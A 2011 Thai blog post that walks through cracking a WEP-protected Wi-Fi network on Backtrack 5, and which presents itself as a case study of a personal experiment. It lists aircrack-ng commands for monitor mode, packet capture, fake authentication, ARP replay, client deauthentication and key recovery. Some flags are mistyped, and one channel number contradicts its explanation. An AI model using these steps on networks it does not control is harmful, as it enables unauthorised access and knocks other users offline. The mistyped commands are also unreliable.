Tuesday, June 28, 2011

กรณีศึกษา ทดลองเจาะ WEP 128 bit บน Backtrack 5 (Hack WEP on Backtrack5)

     ผมเจอวิดีโอการทดสอบการเจาะ WEP บน Backtrack 5 ซึ่งทดลองแล้วก็ได้ผลในเวลาไม่เกิน 15 นาที(ในวิดีโอบอกแค่ 2 นาที)


คำสั่งที่ใช้ในการทดลอง
-airmon-ng
(แสดง Interface ที่มีอยู่)


-airmon-ng start wlan0
(เปิด wlan0 ให้อยู่ในโหมด monitor )


-airodump-ng mon0
(แสกน access point และ client)


-airodump-ng --channell 1 -bssid  XX:XX:XX:XX -w dnsandavideos mon0
(บันทึก Packet  ที่ capturing ได้ จาก channel 11 และ ssid XX:XX:XX:XX ชื่อ dnsandavideos จาก mon0)


-aireplay-ng -1 0 -a XX:XX:XX:XX mon0
(Attack 1: Fake authentication)


-aireplay-ng -3 -b XX:XX:XX:XX mon0
(Attack 3: ARP request replay attack)


-aireplay-ng -0 0 -a XX:XX:XX:XX mon0(Special Attack)
(Attack 0: Deauthentication)


-aircrack-ng dnsandavideos*.cap
(หา Key จากไฟล์ที่ capture ไว้ )


ดูวิดีโอด้านล่างประกอบได้เลยครับ



++คำอธิบายถ้าผิดยังไง ผู้รู้รบกวนบอกด้วยครับ++

เอกสารเพิ่มเติม >>>>  http://www.aircrack-ng.org/

No comments:

Post a Comment